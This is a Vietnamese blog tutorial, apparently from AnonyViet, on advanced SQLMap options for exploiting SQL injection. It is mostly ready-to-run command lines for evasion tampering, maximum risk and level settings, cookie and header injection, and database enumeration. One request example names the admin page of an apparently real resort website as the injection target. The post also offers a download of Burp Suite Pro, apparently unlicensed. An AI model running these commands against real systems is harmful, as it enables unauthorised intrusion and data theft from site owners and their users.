SQLMap là phần mềm giúp khai thác SQL Injection tự động giúp bạn tiết kiệm thời gian hơn so với khai thác thủ công. Mình đã có hướng dẫn cách sử dụng SQLMap cơ bản, tuy nhiên SQLMap vẫn còn các thông số nâng cao giúp bạn tiết kiệm thời gian khai thác và tăng hiệu quả khai thác hơn. Dưới đây là một số kỹ thuật sử dụng SQLMap nâng cao để bạn khai thác lỗi SQL Injection.
Tham gia kênh Telegram của AnonyViet 👉 Link 👈 |
Cách sử dụng SQLMap nâng cao
Mình sẽ nói sơ qua về cách cài đặt và sử dụng SQLMap trước:
Sử dụng --batch
để SQLMap chạy tự động và bỏ qua câu hỏi yes/no
Sử dụng *
xác định vị trí cần Injection
Sử dụng --string="String_in_the_response"
để biết chuỗi nào đã được Injection thành công (True)
sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"
sqlmap -r request.txt
sqlmap -m urls.txt
sqlmap -u "http://afine.com/user/*" -H "User-agent: *"
sqlmap -r request.txt --second-order "http://afine.com/avatar"
--random-agent
--batch
--risk=3 --level=5
--proxy=http://127.0.0.1:8080
-v 0
-v 4
--output-dir=sqlmap
--prefix "this_string_must_be_before_injection"
--suffix "--this_string_must_be_at_the_end_of_injection"
sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'
--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"
-H "Auth_header: secret1" -H "Cookie: auth2=secret2"
python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch
Request dạng POST: Inject vào Username, thì điền dấu * vào username=
POST //index.php?module=user&function=login HTTP/1.1 Host: anonyviet.com username=*&password=1
Lưu file thành request.txt và đặt chung thư mục sqlmap
Request dạng GET:
GET /admin/index.php?option=tin-sua&tin_id=1 Host: phanthiet.terracottaresort.com
Lưu file thành request.txt và đặt chung thư mục sqlmap
Dùng Burp Suite Pro Extension
Tải Burp Suite Pro ở đây
- Request Timer – Bắt các gói tin phản hồi theo thời gian (thích hợp với blind sql injection).
- Burp Bounty Pro: tự động tìm kiếm lỗ hổng bảo mật bằng Burp Suite Pro (bạn nào cần Extension này thì comment bên dưới mình sẽ gửi riêng)
Bất kỳ SQLI nào được tìm thấy bởi SQLiPy sẽ được thêm vào tab Results của Burp Suite.
Payload SQL Injection
Tổng hợp các Payload để test SQL Injection có tại đây: PayloadsAllTheThings.
SQLMap CheatSheel tải ở đây: https://github.com/anonyvietofficial/sqlmap-cheatsheet
Xem Them Chi Tiet
Nhung Mon Do Cong Nghe Duoc Yeu Thich
Do Cong Nghe Phu Kien
0 nhận xét:
Đăng nhận xét